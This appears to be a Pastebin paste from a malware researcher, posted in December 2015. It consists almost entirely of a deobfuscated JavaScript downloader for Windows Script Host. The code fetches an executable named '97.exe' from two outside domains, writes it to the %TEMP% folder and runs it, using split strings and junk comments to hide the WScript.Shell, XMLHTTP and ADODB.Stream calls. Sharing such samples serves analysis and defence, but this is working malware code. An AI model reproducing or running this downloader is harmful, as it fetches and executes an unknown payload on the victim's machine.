SHARE
TWEET

Malicious deobfuscated Javascript

dynamoo Dec 17th, 2015 162 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.  
  3.  
  4.  
  5. var F = "whatdidyaysay.com/97.exe? iamthewinnerhere.com/97.exe? ? ?".split(" ");
  6.  
  7. var eay =((1/*XkY6898914596n498553uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
  8.  
  9. var hb = WScript.CreateObject(eay);
  10.  
  11. var lA = "%TEMP%\\";
  12.  
  13. var LDM = hb.ExpandEnvironmentStrings(lA);
  14.  
  15. var THf = "2.XMLH";
  16.  
  17. var ugI = THf + "TTP";
  18.  
  19. var Rx = true  , lPAf = "ADOD";
  20.  
  21. var Dr = WScript.CreateObject("MS"+"XML"+(455298, ugI));
  22.  
  23. var obB = WScript.CreateObject(lPAf + "B.St"+(263475, "ream"));
  24.  
  25. var CRm = 0;
  26.  
  27. var j = 1;
  28.  
  29. var jsWyQeZ = 460700;
  30.  
  31. for (var m=CRm; m<F.length; m++)  {
  32.  
  33. var JM = 0;
  34.  
  35. try  {
  36.  
  37. poi = "GET";
  38.  
  39. Dr.open(poi,"http://"+F[m]+j, false); Dr.send(); if (Dr.status == 676-476)  {      
  40.  
  41. obB.open(); obB.type = 1; obB.write(Dr.responseBody); if (obB.size > 200467-525)  {
  42.  
  43. JM = 1; obB.position = 0; obB.saveToFile/*wjdy85bDIL*/(LDM/*V5op15iHXQ*/+jsWyQeZ+".exe",4-2); try  {
  44.  
  45. if (((new Date())>0,7821551888)) {
  46.  
  47. hb./*d303164UY65*/Run(LDM+jsWyQeZ+/*75F530NLtQ*/".exe",/*wlhn176xuN*/3-2,0);
  48.  
  49. break;
  50.  
  51. }
  52.  
  53. }
  54.  
  55. catch (Wr)  {
  56.  
  57. };
  58.  
  59. }; obB.close();
  60.  
  61. };
  62.  
  63. if (JM == 1)  {
  64.  
  65. CRm = m; break;
  66.  
  67. };
  68.  
  69. }
  70.  
  71. catch (Wr)  {
  72.  
  73. };
  74.  
  75. };
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top